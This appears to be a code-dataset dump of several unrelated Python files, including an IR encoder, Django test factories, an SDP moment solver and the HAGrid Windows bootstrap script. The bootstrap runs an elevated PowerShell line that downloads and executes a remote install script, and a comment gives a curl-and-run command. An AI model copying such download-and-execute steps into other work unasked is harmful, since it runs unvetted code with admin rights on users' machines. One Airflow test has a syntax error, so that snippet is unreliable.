id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
8158169 | <gh_stars>0
"""Classes and functions to perform encoding."""
from __future__ import annotations
# pylint: disable=cyclic-import
from remoteprotocols import codecs
def encode_rule(
rule: codecs.RuleDef, args: list[int], timings: codecs.TimingsDef
) -> list[int]:
"""Convert a single rule into signal pulses."""
# Case named timings rule:
if rule.type > 0:
return timings.get_slot(rule.type - 1, args)
# Case data rule
if rule.type == 0:
data = rule.eval_op(rule.data.get(args))
nbits = rule.nbits.get(args)
if rule.action == "M":
bits = range(nbits - 1, -1, -1)
else:
bits = range(0, nbits, 1)
signal = []
for i in bits:
signal += timings.get_bit(data & (1 << i), args)
return signal
# Case condition rule
if rule.type == -1:
if rule.eval_cond(args):
return encode_rules(rule.consequent, args, timings) # type: ignore
if rule.alternate:
return encode_rules(rule.alternate, args, timings)
return []
def encode_rules(
rules: list[codecs.RuleDef], args: list[int], timings: codecs.TimingsDef
) -> list[int]:
"""Convert a list of rules into signal pulses."""
signal = []
for rule in rules:
signal += encode_rule(rule, args, timings)
return signal
def encode_pattern(
pattern: codecs.PatternDef, args: list[int], timings: codecs.TimingsDef
) -> list[int]:
"""Convert. a pattern into the corresponding signal."""
result = []
repeat = 1
if hasattr(pattern, "repeat_send"):
repeat = pattern.repeat_send.get(args)
elif hasattr(pattern, "repeat"):
repeat = pattern.repeat.get(args)
if hasattr(pattern, "pre"):
result += encode_rules(pattern.pre, args, timings)
for _ in range(repeat):
result += encode_rules(pattern.data, args, timings)
if hasattr(pattern, "mid"):
result += encode_rules(pattern.mid, args, timings)
if hasattr(pattern, "post"):
result += encode_rules(pattern.post, args, timings)
return result
| StarcoderdataPython |
5058083 | <reponame>stevepiercy/pycon
import random
import factory
import factory.django
import factory.fuzzy
from django.contrib.auth import models as auth
from pycon.models import PyConProposalCategory, PyConProposal, \
PyConTalkProposal, PyConTutorialProposal
from symposion.proposals.tests.factories import ProposalKindFactory, \
ProposalBaseFactory
class UserFactory(factory.django.DjangoModelFactory):
FACTORY_FOR = auth.User
username = factory.fuzzy.FuzzyText()
first_name = factory.fuzzy.FuzzyText()
last_name = factory.fuzzy.FuzzyText()
email = factory.Sequence(lambda n: '<EMAIL>'.<EMAIL>(n))
class PyConProposalCategoryFactory(factory.django.DjangoModelFactory):
FACTORY_FOR = PyConProposalCategory
class PyConProposalFactory(ProposalBaseFactory):
FACTORY_FOR = PyConProposal
ABSTRACT_FACTORY = True
category = factory.SubFactory(PyConProposalCategoryFactory)
audience_level = factory.LazyAttribute(lambda a: random.choice([1, 2, 3]))
class PyConTalkProposalFactory(PyConProposalFactory):
FACTORY_FOR = PyConTalkProposal
duration = 0
kind = factory.SubFactory(ProposalKindFactory,
name="talk",
slug="talk")
outline = "outline"
audience = "audience"
perceived_value = "perceived_value"
class PyConTutorialProposalFactory(PyConProposalFactory):
FACTORY_FOR = PyConTutorialProposal
kind = factory.SubFactory(ProposalKindFactory,
name="tutorial",
slug="tutorial")
domain_level = 1
outline = "outline"
more_info = "more info"
audience = "audience"
perceived_value = "perceived_value"
| StarcoderdataPython |
12844159 | # pylint: disable=unused-import
import pytest
import tests.helpers.constants as constants
from tests.helpers.utils import *
from geckordp.rdp_client import RDPClient
from geckordp.actors.root import RootActor
from geckordp.actors.descriptors.tab import TabActor
from geckordp.actors.accessibility.accessibility import AccessibilityActor
from geckordp.logger import log, logdict
def init():
cl = RDPClient(3)
cl.connect(constants.REMOTE_HOST, constants.REMOTE_PORT)
root = RootActor(cl)
current_tab = root.current_tab()
tab = TabActor(cl, current_tab["actor"])
actor_ids = tab.get_target()
accessibility = AccessibilityActor(cl, actor_ids["accessibilityActor"])
accessibility.bootstrap()
return cl, accessibility
def test_get_traits():
cl = None
try:
cl, accessibility = init()
val = accessibility.get_traits()
assert val.get("tabbingOrder", None) is not None
finally:
cl.disconnect()
def test_bootstrap():
cl = None
try:
cl, accessibility = init()
val = accessibility.bootstrap()
assert len(val.keys()) > 0
finally:
cl.disconnect()
def test_get_walker():
cl = None
try:
cl, accessibility = init()
val = accessibility.get_walker()
assert val.get("actor", None) is not None
finally:
cl.disconnect()
def test_get_simulator():
cl = None
try:
cl, accessibility = init()
val = accessibility.get_simulator()
simulator_id = val.get("actor", None)
if (simulator_id is None):
log("No simulator actor found, firefox is probably running in headless mode")
finally:
cl.disconnect()
| StarcoderdataPython |
3297669 | # -*- coding: utf-8 -*-
from acrylamid.utils import Metadata, neighborhood
import attest
tt = attest.Tests()
class TestMetadata(attest.TestBase):
@attest.test
def works(self):
dct = Metadata()
dct['hello.world'] = 1
assert dct['hello']['world'] == 1
assert dct.hello.world == 1
try:
dct.foo
dct.foo.bar
except KeyError:
assert True
else:
assert False
dct['hello.foreigner'] = 2
assert dct['hello']['world'] == 1
assert dct.hello.world == 1
assert dct.hello.foreigner == 2
@attest.test
def redirects(self):
dct = Metadata()
alist = [1, 2, 3]
dct['foo'] = alist
dct.redirect('foo', 'baz')
assert 'foo' not in dct
assert 'baz' in dct
assert dct['baz'] == alist
@attest.test
def update(self):
dct = Metadata()
dct.update({'hello.world': 1})
assert 'hello' in dct
assert dct.hello.world == 1
@attest.test
def init(self):
assert Metadata({'hello.world': 1}).hello.world == 1
@tt.test
def neighbors():
assert list(neighborhood([1, 2, 3])) == \
[(None, 1, 2), (1, 2, 3), (2, 3, None)]
| StarcoderdataPython |
3423036 | <gh_stars>0
# emailstore.py
# Copyright 2014 <NAME>
# Licence: See LICENCE (BSD licence)
"""Email selection collection application."""
if __name__ == "__main__":
from . import APPLICATION_NAME
try:
from solentware_misc.gui.startstop import (
start_application_exception,
stop_application,
application_exception,
)
except Exception as error:
import tkinter.messagebox
try:
tkinter.messagebox.showerror(
title="Start Exception",
message=".\n\nThe reported exception is:\n\n".join(
(
"Unable to import solentware_misc.gui.startstop module",
str(error),
)
),
)
except BaseException:
pass
raise SystemExit(
"Unable to import start application utilities"
) from None
try:
from .gui.select import Select
except Exception as error:
start_application_exception(
error, appname=APPLICATION_NAME, action="import"
)
raise SystemExit(
" import ".join(("Unable to", APPLICATION_NAME))
) from None
try:
app = Select(title=APPLICATION_NAME, width=400, height=200)
except Exception as error:
start_application_exception(
error, appname=APPLICATION_NAME, action="initialise"
)
raise SystemExit(
" initialise ".join(("Unable to", APPLICATION_NAME))
) from None
try:
app.root.mainloop()
except SystemExit:
stop_application(app, app.root)
raise
except Exception as error:
application_exception(
error,
app,
app.root,
title=APPLICATION_NAME,
appname=APPLICATION_NAME,
)
| StarcoderdataPython |
8073783 | <reponame>toptive/generator-toptive-python
# -*- coding: utf-8 -*-
"""Top-level package for <%= projectName %>."""
__author__ = '<%= projectAuthor %>'
__email__ = '<%= authorEmail %>'
__version__ = '<%= projectVersion %>'
| StarcoderdataPython |
4921554 | #!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Solve a given moment matrix using various ways.
"""
from cvxopt import matrix, sparse, spmatrix, spdiag
import cvxopt.solvers as cvxsolvers
cvxsolvers.options['maxiters'] = 150
cvxsolvers.options['feastol'] = 1e-6
cvxsolvers.options['abstol'] = 1e-7
cvxsolvers.options['reltol'] = 1e-6
cvxsolvers.options['show_progress'] = False
import sympy as sp
import numpy as np
import scipy as sc
import ipdb
import itertools
from core import MomentMatrix
from core import LocalizingMatrix
_debug_mmsolvers = False
def monomial_filter(mono, filter='even'):
if filter is 'even':
if _debug_mmsolvers and not mono==1:
print str(mono) + ':\t' + str(all([(i%2)==0 for i in mono.as_poly().degree_list()]))
return 1 if mono==1 else int(all([i%2==0 for i in mono.as_poly().degree_list()]))
def get_cvxopt_Gh(LM, sparsemat = True):
"""
get the G and h corresponding to this localizing matrix
"""
if sparsemat:
G = sparse(LM.get_LMI_coefficients(), tc='d').trans()
else:
G = matrix(LM.get_LMI_coefficients(), tc='d').trans()
num_rms = len(LM.row_monos)
h = matrix(np.zeros((num_rms, num_rms)))
return {'G':G, 'h':h}
def get_cvxopt_inputs(MM, constraints = None, slack = 0, sparsemat = True, filter = 'even'):
"""
if provided, constraints should be a list of sympy polynomials that should be 0.
@params - constraints: a list of sympy expressions representing the constraints in the same
"""
# Many optionals for what c might be, not yet determined really
if filter is None:
c = matrix(np.ones((MM.num_matrix_monos, 1)))
else:
c = matrix([monomial_filter(yi, filter='even') for yi in MM.matrix_monos], tc='d')
Anp,bnp = MM.get_Ab(constraints)
#_, residual, _, _ = scipy.linalg.lstsq(Anp, bnp)
b = matrix(bnp)
indicatorlist = MM.get_LMI_coefficients()
Glnp,hlnp = MM.get_Ab_slack(constraints, abs_slack = slack, rel_slack = slack)
hl = matrix(hlnp)
if sparsemat:
G = [sparse(indicatorlist).trans()]
A = sparse(matrix(Anp))
Gl = sparse(matrix(Glnp))
else:
G = [matrix(indicatorlist).trans()]
A = matrix(Anp)
Gl = matrix(Glnp)
num_row_monos = len(MM.row_monos)
h = [matrix(np.zeros((num_row_monos,num_row_monos)))]
return {'c':c, 'G':G, 'h':h, 'A':A, 'b':b, 'Gl':Gl, 'hl':hl}
def get_constraint_row_monos(MM, constr):
Ai = np.zeros(len(MM.row_monos))
coefdict = constr.as_coefficients_dict()
for i,yi in enumerate(len(MM.row_monos)):
Ai[i] = coefdict.get(yi,0)
return Ai
def solve_ith_GMP(MM, objective, gs, hs, slack = 0):
"""
Generalized moment problem solver
@param - objective: a sympy expression that is the objective
@param - gs: list of contraints defining the semialgebraic set K,
each g corresponds to localizing matrices.
@param - hs: constraints on the moments,
not needed for polynomial optimization.
@param - slack: add equalities as pairs of inequalities with slack separation.
"""
cin = get_cvxopt_inputs(MM, hs, slack=slack)
Bf = MM.get_Bflat()
objcoeff,__ = MM.get_Ab([objective], cvxoptmode = False)
locmatrices = [LocalizingMatrix(MM, g) for g in gs]
Ghs = [get_cvxopt_Gh(lm) for lm in locmatrices]
# list addition
Gs=cin['G'] + [Gh['G'] for Gh in Ghs]
hs=cin['h'] + [Gh['h'] for Gh in Ghs]
# print Ghs
solsdp = cvxsolvers.sdp(matrix(objcoeff[0,:]), Gs=Gs, hs=hs, A=cin['A'], b=cin['b'])
#ipdb.set_trace()
return solsdp
def solve_GMP(objective, gs = None, hs = None, rounds = 1, slack = 1e-6):
"""
Outer loop of the generalized moment problem solver
@param - objective: a sympy expression that is the objective
@param - gs: list of constraints defining the semialgebraic set K,
each g corresponds to localizing matrices. These should be non-strict sympy inequalities.
@param - hs: constraints on the moments. Currently only supporting equalities.
@param - rounds: rounds of relaxation to carry out, default=0.
"""
if gs is None: gs = []
if hs is None: hs = []
# problem setup here
constrs = []
syms = objective.free_symbols
mindeg = objective.as_poly().total_degree()
for h in hs:
if type(h) == sp.relational.GreaterThan or type(h) == sp.relational.LessThan:
raise NotImplemented('currently only supporting equalities')
for g in gs:
if type(g) == sp.relational.GreaterThan:
nf = g.lhs - g.rhs
elif type(g) == sp.relational.LessThan:
nf = (g.rhs - g.lhs).expand()
else:
raise ValueError('only supporting inequality constraints with >= and <=, ' +
'convert your equality constraints!')
constrs += [nf]
degnf = nf.as_poly().total_degree()
if degnf > mindeg: mindeg = degnf
syms.update(nf.free_symbols)
print 'the maximum degree appearing in the problem is %d' % mindeg
#for g in constrs:
# print g
mdeg = int( (mindeg+1)/2 )
objvals = {}
for i in range(mdeg,mdeg + rounds):
MM = MomentMatrix(i, list(syms), morder='grevlex')
soldict = solve_ith_GMP(MM, objective, constrs, hs, slack = slack)
soldict['MM'] = MM
print 'status: ' + soldict['status']
r = np.linalg.matrix_rank(MM.numeric_instance(soldict['x']), 1e-2)
print 'round=%d,\t rank=%d,\t size=%d,\t obj=%.3f'\
% (i-mdeg+1, r, len(MM), soldict['primal objective'])
objvals[i] = soldict['primal objective']
return soldict
def solve_basic_constraints(MM, constraints, slack = 1e-2):
"""
Solve using the moment matrix.
Use @symbols with basis bounded by degree @deg.
Also use the constraints.
"""
cin = get_cvxopt_inputs(MM, constraints, slack=slack)
Bf = MM.get_Bflat()
R = np.random.rand(len(MM), len(MM))
W = R.dot(R.T)
#W = np.eye(len(MM))
w = Bf.dot(W.flatten())
solsdp = cvxsolvers.sdp(c=cin['c'], Gs=cin['G'], hs=cin['h'], Gl=cin['Gl'], hl=cin['hl'])
#ipdb.set_trace()
return solsdp
def solve_generalized_mom_coneqp(MM, constraints, pconstraints=None, maxiter = 1):
"""
solve using iterative GMM using the quadratic cone program
func_W takes a solved instance and returns the weighting matrix,
this function has access to individual data points
@params
constraints - E[g(x,X)] = f(x) - h(X) that are supposed to be 0
Eggt - the function handle takes current f(x) and estimates
E[g(x,X)g(x,X)'] \in \Re^{n \times n}, the information matrix
maxiter - times to run the iterative GMM
"""
N = len(constraints)
D = len(MM.matrix_monos)
sr = len(MM.row_monos)
A,b = MM.get_Ab(constraints, cvxoptmode = False)
#ipdb.set_trace()
# augumented constraint matrix introduces slack variables g
A_aug = sparse(matrix(sc.hstack((A, 1*sc.eye(N+1)[:,:-1]))))
P = spdiag([matrix(0*np.eye(D)), matrix(np.eye(N))])
b = matrix(b)
indicatorlist = MM.get_LMI_coefficients()
G = sparse(indicatorlist).trans()
V,I,J = G.V, G.I, G.J,
Gaug = sparse(spmatrix(V,I,J,size=(sr*sr, N + D)))
h = matrix(np.zeros((sr*sr,1)))
dims = {}
dims['l'] = 0
dims['q'] = []
dims['s'] = [sr]
Bf = MM.get_Bflat()
R = np.random.rand(len(MM), len(MM))
W = R.dot(R.T)
W = np.eye(len(MM))
w = Bf.dot(W.flatten())[:,np.newaxis]
q = 1e-5*matrix(np.vstack( (w,np.zeros((N,1))) ))
#ipdb.set_trace()
for i in xrange(maxiter):
w = Bf.dot(W.flatten())[:,np.newaxis]
sol = cvxsolvers.coneqp(P, q, G=Gaug, h=h, dims=dims, A=A_aug, b=b)
sol['x'] = sol['x'][0:D]
return sol
def solve_generalized_mom_conelp(MM, constraints, W=None, absslack=1e-4, totalslack=1e-2, maxiter = 1):
"""
solve using iterative GMM using the cone linear program
W is a specific weight matrix
we give generous bound for each constraint, and then harsh bound for
g'Wg
@params
constraints - E[g(x,X)] = f(x) - phi(X) that are supposed to be 0
Eggt - the function handle takes current f(x) and estimates
E[g(x,X)g(x,X)'] \in \Re^{n \times n}, the information matrix
maxiter - times to run the iterative GMM
"""
N = len(constraints)
D = len(MM.matrix_monos)
sr = len(MM.row_monos)
A,b = MM.get_Ab(constraints, cvxoptmode = False)
# augumented constraint matrix introduces slack variables g
A_aug = sparse(matrix(sc.hstack((A, 1*sc.eye(N+1)[:,:-1]))))
P = spdiag([matrix(0*np.eye(D)), matrix(np.eye(N))])
b = matrix(b)
indicatorlist = MM.get_LMI_coefficients()
G = sparse(indicatorlist).trans()
V,I,J = G.V, G.I, G.J,
Gaug = sparse(spmatrix(V,I,J,size=(sr*sr, N + D)))
h = matrix(np.zeros((sr*sr,1)))
dims = {}
dims['l'] = 0
dims['q'] = []
dims['s'] = [sr]
Bf = MM.get_Bflat()
R = np.random.rand(len(MM), len(MM))
#W = R.dot(R.T)
W = np.eye(len(MM))
w = Bf.dot(W.flatten())[:,np.newaxis]
q = matrix(np.vstack( (w,np.zeros((N,1))) ))
#ipdb.set_trace()
for i in xrange(maxiter):
w = Bf.dot(W.flatten())[:,np.newaxis]
sol = cvxsolvers.coneqp(P, q, G=Gaug, h=h, dims=dims, A=A_aug, b=b)
sol['x'] = sol['x'][0:D]
return sol
# solve for the weight matrix in convex iteration
def solve_W(Xstar, rank):
"""
minimize trace(Xstar*W)
s.t. 0 \preceq W \preceq I
trace(W) = n - rank
"""
Balpha = []
numrow = Xstar.shape[0]
lowerdiaginds = [(i,j) for (i,j) in \
itertools.product(xrange(numrow), xrange(numrow)) if i>j]
diaginds = [i+i*numrow for i in xrange(numrow)]
for i in diaginds:
indices = [i]
values = [-1]
Balpha += [spmatrix(values, [0]*len(indices), \
indices, size=(1,numrow*numrow), tc='d')]
for i,j in lowerdiaginds:
indices = [i+j*numrow, j+i*numrow]
values = [-1, -1]
Balpha += [spmatrix(values, [0]*len(indices), \
indices, size=(1,numrow*numrow), tc='d')]
Gs = [sparse(Balpha, tc='d').trans()] + [-sparse(Balpha, tc='d').trans()]
hs = [matrix(np.zeros((numrow, numrow)))] + [matrix(np.eye(numrow))]
A = sparse(spmatrix([1]*numrow, [0]*numrow, \
range(numrow), size=(1,numrow*(numrow+1)/2), tc='d'))
b = matrix([numrow - rank], size=(1,1), tc='d')
x = [np.sum(Xstar.flatten()*matrix(Balphai)) for Balphai in Balpha]
sol = cvxsolvers.sdp(-matrix(x), Gs=Gs, hs=hs, A=A, b=b)
w = sol['x']
Wstar = 0
for i,val in enumerate(w):
Wstar += -val*np.array(Balpha[i])
#ipdb.set_trace()
return Wstar,sol
def solve_moments_with_convexiterations(MM, constraints, maxrank = 3, slack = 1e-3, maxiter = 200):
"""
Solve using the moment matrix iteratively using the rank constrained convex iterations
Use @symbols with basis bounded by degree @deg.
Also use the constraints.
"""
cin = get_cvxopt_inputs(MM, constraints)
Bf = MM.get_Bflat()
R = np.random.rand(len(MM), len(MM))
#W = R.dot(R.T)
W = np.eye(len(MM))
tau = []
for i in xrange(maxiter):
w = Bf.dot(W.flatten())
#solsdp = cvxsolvers.sdp(matrix(w), Gs=cin['G'], hs=cin['h'], A=cin['A'], b=cin['b'])
solsdp = cvxsolvers.sdp(matrix(w), Gs=cin['G'], hs=cin['h'], Gl=cin['Gl'], hl=cin['hl'])
Xstar = MM.numeric_instance(solsdp['x'])
W,solW = solve_W(Xstar, maxrank)
W = np.array(W)
ctau = np.sum(W * Xstar.flatten())
if ctau < 1e-3:
break
tau.append(ctau)
#ipdb.set_trace()
print tau
return solsdp
def test_mmsolvers():
# simple test to make sure things run
print 'testing simple unimixture with a skipped observation, just to test that things run'
x = sp.symbols('x')
M = MomentMatrix(3, [x], morder='grevlex')
constrs = [x-1.5, x**2-2.5, x**4-8.5]
#constrs = [x-1.5, x**2-2.5, x**3-4.5, x**4-8.5]
cin = get_cvxopt_inputs(M, constrs, slack = 1e-5)
#import MomentMatrixSolver
#print 'joint_alternating_solver...'
#y,L = MomentMatrixSolver.sgd_solver(M, constrs, 2, maxiter=101, eta = 0.001)
#y,X = MomentMatrixSolver.convex_projection_solver(M, constrs, 2, maxiter=2000)
#print y
#print X
gs = [2-x, 2+x]
locmatrices = [LocalizingMatrix(M, g) for g in gs]
Ghs = [get_cvxopt_Gh(lm) for lm in locmatrices]
Gs=cin['G'] + [Gh['G'] for Gh in Ghs]
hs=cin['h'] + [Gh['h'] for Gh in Ghs]
sol = cvxsolvers.sdp(cin['c'], Gs=Gs, \
hs=hs, A=cin['A'], b=cin['b'])
print sol['x']
print abs(sol['x'][3]-4.5)
assert(abs(sol['x'][3]-4.5) <= 1e-3)
import extractors
print extractors.extract_solutions_lasserre(M, sol['x'], Kmax = 2)
print 'true values are 1 and 2'
if __name__=='__main__':
test_mmsolvers()
| StarcoderdataPython |
8037381 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import io
import os
import unittest
from unittest.mock import call, patch
from parameterized import parameterized
from airflow.exceptions import AirflowException
from airflow.models import Connection
from airflow.providers.teradata.hooks.ttu import TtuHook
from airflow.utils import db
class TestTtuHook(unittest.TestCase):
_simple_bteq = """SELECT CURRENT_DATE;
.IF ERRORCODE <> 0 THEN .QUIT 0300;.QUIT 0;"""
def setUp(self):
db.merge_conn(
Connection(
conn_id='ttu_default',
conn_type='ttu',
host='localhost',
login='login'
password='password',
)
)
def test_build_bteq_file(self):
# Given
hook = TtuHook(ttu_conn_id='ttu_default')
conn = hook.get_conn()
# When
bteq = hook._prepare_bteq_script(self._simple_bteq,
conn['host'],
conn['login'],
conn['password'],
conn['bteq_output_width'],
conn['bteq_session_encoding'],
conn['bteq_quit_zero']
)
# Then
expected_bteq = """
.LOGON localhost/login,
.SET WIDTH 65531;
.SET SESSION CHARSET 'ASCII';
SELECT CURRENT_DATE;
.IF ERRORCODE <> 0 THEN .QUIT 0300;
.QUIT 0;
"""
self.assertEqual(expected_bteq, expected_bteq)
| StarcoderdataPython |
8189611 | <filename>gcnlive/main.py
import os
import sys
import voeventparse
import twitter
import voeventparse
def tweet(text, key_path):
with open(key_path, 'r') as f:
keys = f.read().splitlines()
api = twitter.Api(consumer_key=keys[0],
consumer_secret=keys[1],
access_token_key=keys[2],
access_token_secret=keys[3])
api.PostUpdate(text)
def main():
key_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), '.keysecret')
stdin = sys.stdin.read()
v = voeventparse.loads(stdin)
response = process_voevent(v)
if response is not None:
print(response)
# tweet(response, key_path)
def handle_grb(v):
coords = voeventparse.pull_astro_coords(v)
text = "Swift GRB Alert received, coords are {}".format(coords)
return text
def handle_pointing(v):
coords = voeventparse.pull_astro_coords(v)
text = "Swift repointing, coords are {}".format(coords)
return text
prefix_handler_map = {
'ivo://nasa.gsfc.gcn/SWIFT#BAT_GRB_Pos': handle_grb,
"ivo://nasa.gsfc.gcn/SWIFT#Point_Dir_": handle_pointing,
}
def process_voevent(v):
ivorn = v.attrib['ivorn']
for prefix, handler in prefix_handler_map.items():
if ivorn.startswith(prefix):
return handler(v)
return None | StarcoderdataPython |
9716797 | <reponame>vishalbelsare/PySyft<filename>packages/hagrid/hagrid/win_bootstrap.py
# coding=utf-8
# stdlib
import subprocess
from typing import Callable
from typing import List
# one liner to use bootstrap script:
# CMD: curl https://raw.githubusercontent.com/OpenMined/PySyft/dev/packages/hagrid/hagrid/win_bootstrap.py > win_bootstrap.py && python win_bootstrap.py # noqa
# Powershell is complaining about a utf-8 issue we need to fix, could be related to a
# bug with long lines in utf-8
# PS: $r = Invoke-WebRequest "https://raw.githubusercontent.com/OpenMined/PySyft/dev/packages/hagrid/hagrid/win_bootstrap.py" -UseBasicParsing; echo $r.Content > win_bootstrap.py; python win_bootstrap.py # noqa
class Requirement:
def __init__(
self, full_name: str, choco_name: str, detect: Callable, extras: str = ""
) -> None:
self.full_name = full_name
self.choco_name = choco_name
self.detect = detect
self.extras = extras
def __repr__(self) -> str:
return self.full_name
install_choco_pwsh = """
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'));
"""
install_wsl2_pwsh = """
wsl --update; wsl --shutdown; wsl --set-default-version 2; wsl --install -d Ubuntu; wsl --setdefault Ubuntu;
"""
# add this to block powershell from existing for debugging
# Read-Host -Prompt string
def make_admin_cmd(admin_cmd: str) -> str:
return (
f"Start-Process PowerShell -Wait -Verb RunAs -ArgumentList "
'"'
"Set-ExecutionPolicy Bypass -Scope Process -Force; "
f"{admin_cmd}; "
'"'
)
def where_is(binary: str, req: Requirement) -> bool:
print(f"{req.full_name} - {binary}", end="", flush=True)
found = path_where_is(binary)
if not found:
found = full_where_is(binary)
if found:
print(" √")
else:
print(" ×")
return found
def path_where_is(binary: str) -> bool:
try:
cmds = ["where.exe", binary]
output = subprocess.run(cmds, capture_output=True, cwd="C:\\")
out = str(output.stdout.decode("utf-8")).split("\r\n")
if binary in out[0]:
return True
except Exception as e:
print("error", e)
pass
return False
def full_where_is(binary: str) -> bool:
try:
powershell_cmd = f"where.exe /R C:\ *.exe | findstr \\{binary}$" # noqa: W605
cmds = ["powershell.exe", "-Command", powershell_cmd]
output = subprocess.run(cmds, capture_output=True, cwd="C:\\")
out = str(output.stdout.decode("utf-8")).split("\r\n")
if binary in out[0]:
return True
except Exception as e:
print("error", e)
pass
return False
def exe(binary: str) -> Callable:
def call(req: Requirement) -> bool:
return where_is(binary=binary, req=req)
return call
def detect_wsl2(req: Requirement) -> bool:
print(f"{req.full_name} - wsl.exe ", end="")
try:
powershell_cmd = "wsl.exe --status"
cmds = ["powershell.exe", "-Command", powershell_cmd]
output = subprocess.run(cmds, capture_output=True)
out = output.stdout.decode("utf-16")
if "Default Distribution: Ubuntu" in out:
pass
if "Default Version: 2" in out:
print(" √")
return True
except Exception as e:
print("error", e)
pass
print(" ×")
return False
requirements = []
requirements.append(
Requirement(
full_name="Windows Subsystem for Linux 2",
choco_name="wsl2",
detect=detect_wsl2,
)
)
requirements.append(
Requirement(
full_name="Chocolatey Package Manager",
choco_name="choco",
detect=exe("choco.exe"),
)
)
requirements.append(
Requirement(
full_name="Anaconda Individual Edition",
choco_name="anaconda3",
detect=exe("conda.exe"),
)
)
requirements.append(
Requirement(
full_name="Git Version Control",
choco_name="git",
detect=exe("git.exe"),
)
)
requirements.append(
Requirement(
full_name="Docker Desktop",
choco_name="docker-desktop",
detect=exe("docker.exe"),
)
)
def install_elevated_powershell(full_name: str, powershell_cmd: str) -> None:
try:
input(
f"\nInstalling {full_name} requires Administrator.\n"
"When the UAC dialogue appears click Yes on the left.\n\n"
"Press enter to start..."
)
powershell_cmds = ["-command", powershell_cmd]
output = subprocess.run(
["powershell.exe"] + powershell_cmds, capture_output=True
)
_ = output.stdout.decode("utf-8")
except Exception as e:
print("failed", e)
def install_choco() -> None:
return install_elevated_powershell(
full_name="Chocolatey", powershell_cmd=make_admin_cmd(install_choco_pwsh)
)
def install_wsl2() -> None:
return install_elevated_powershell(
full_name="WSL2", powershell_cmd=make_admin_cmd(install_wsl2_pwsh)
)
def install_deps(requirements: List[Requirement]) -> None:
package_names = []
for req in requirements:
package_names.append(req.choco_name)
try:
input(
"\nInstalling packages requires Administrator.\n"
"When the UAC dialogue appears click Yes on the left.\n\n"
"Press enter to start..."
)
choco_args = f"choco.exe install {' '.join(package_names)} -y"
powershell_cmds = ["-command", make_admin_cmd(choco_args)]
output = subprocess.run(
["powershell.exe"] + powershell_cmds, capture_output=True
)
_ = str(output.stdout.decode("utf-8"))
except Exception as e:
print("failed", e)
def ask_install(requirement: Requirement) -> bool:
val = input(f"Do you want to install {requirement.full_name} (Y/n): ")
if "y" in val.lower():
return True
return False
def check_all(requirements: List[Requirement]) -> List[Requirement]:
missing = []
for req in requirements:
if not req.detect(req):
missing.append(req)
return missing
def main() -> None:
print("\nHAGrid Windows Dependency Installer")
print("===================================\n")
print("Searching your computer for:")
missing_deps = check_all(requirements=requirements)
if len(missing_deps) > 0:
print("\nWe were unable to find the following dependencies:")
print("-----------------------------------")
for dep in missing_deps:
print(f"{dep.full_name}")
print("")
desired = []
choco_required = False
wsl2_required = False
for dep in missing_deps:
if ask_install(dep):
if dep.choco_name == "choco":
choco_required = True
elif dep.choco_name == "wsl2":
wsl2_required = True
else:
desired.append(dep)
elif dep.choco_name == "choco":
print("You must install Chocolatey to install other dependencies")
return
if wsl2_required:
install_wsl2()
if choco_required:
install_choco()
if len(desired) > 0:
install_deps(desired)
print("")
still_missing = check_all(requirements=missing_deps)
if len(still_missing) > 0:
print("We were still unable to find the following dependencies:")
print("-----------------------------------")
for dep in still_missing:
print(f"{dep.full_name}")
print("Please try again.")
else:
print("\nCongratulations. All done.")
print("===================================\n")
print("Now you can run HAGrid on Windows!")
if __name__ == "__main__":
main()
| StarcoderdataPython |
1677050 | <filename>core/entities/poll.py
'''
Entity that sets the questions and manage the expiration of the survey
'''
from typing import Optional, List
from dataclasses import dataclass
from datetime import datetime
import public # type: ignore
from . import question # pylint: disable=unused-import
@public.add
@dataclass
class Poll:
'''
this its a domain object doesnt need have been attached to any database orm
or any other persistence system
'''
parent: Optional['Poll']
expires_at: datetime
questions: List['question.Question']
def has_expired(self) -> bool:
'''
this accessor checks the expiration date with de current datetime
:return bool
'''
return self.expires_at < datetime.now()
| StarcoderdataPython |
3248739 | <gh_stars>1-10
# coding: utf-8
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
# Command line :
# python -m benchmark.HIGGS.explore.tau_effect
import os
import datetime
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from config import SAVING_DIR
from config import SEED
from visual import set_plot_config
set_plot_config()
from problem.higgs.higgs_geant import load_data
from problem.higgs.higgs_geant import split_data_label_weights
from problem.higgs import get_parameter_class
from problem.higgs import get_higgsnll_class
from problem.higgs import get_config_class
from problem.higgs import get_generator_class
from problem.higgs import get_higgsloss_class
from problem.higgs import get_parameter_generator
TES = True
JES = False
LES = False
Parameter = get_parameter_class(TES, JES, LES)
NLLComputer = get_higgsnll_class(TES, JES, LES)
Config = get_config_class(TES, JES, LES)
GeneratorClass = get_generator_class(TES, JES, LES)
HiggsLoss = get_higgsloss_class(TES, JES, LES)
param_generator = get_parameter_generator(TES, JES, LES)
DATA_NAME = 'HIGGS'
BENCHMARK_NAME = DATA_NAME
DIRECTORY = os.path.join(SAVING_DIR, BENCHMARK_NAME, "explore")
def main():
print('Hello world')
os.makedirs(DIRECTORY, exist_ok=True)
data = load_data()
generator = GeneratorClass(data, seed=2)
dirname = os.path.join(DIRECTORY, 'tes_minibatch')
os.makedirs(dirname, exist_ok=True)
minibatchsize(generator, dirname=dirname)
def minibatchsize(generator, dirname=DIRECTORY):
DELTA = 0.03
config = Config()
nominal_param = config.CALIBRATED#.clone_with(mu=0.5)
up_param = nominal_param.clone_with(tes=nominal_param.tes + DELTA)
down_param = nominal_param.clone_with(tes=nominal_param.tes - DELTA)
now = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M-%S\n")
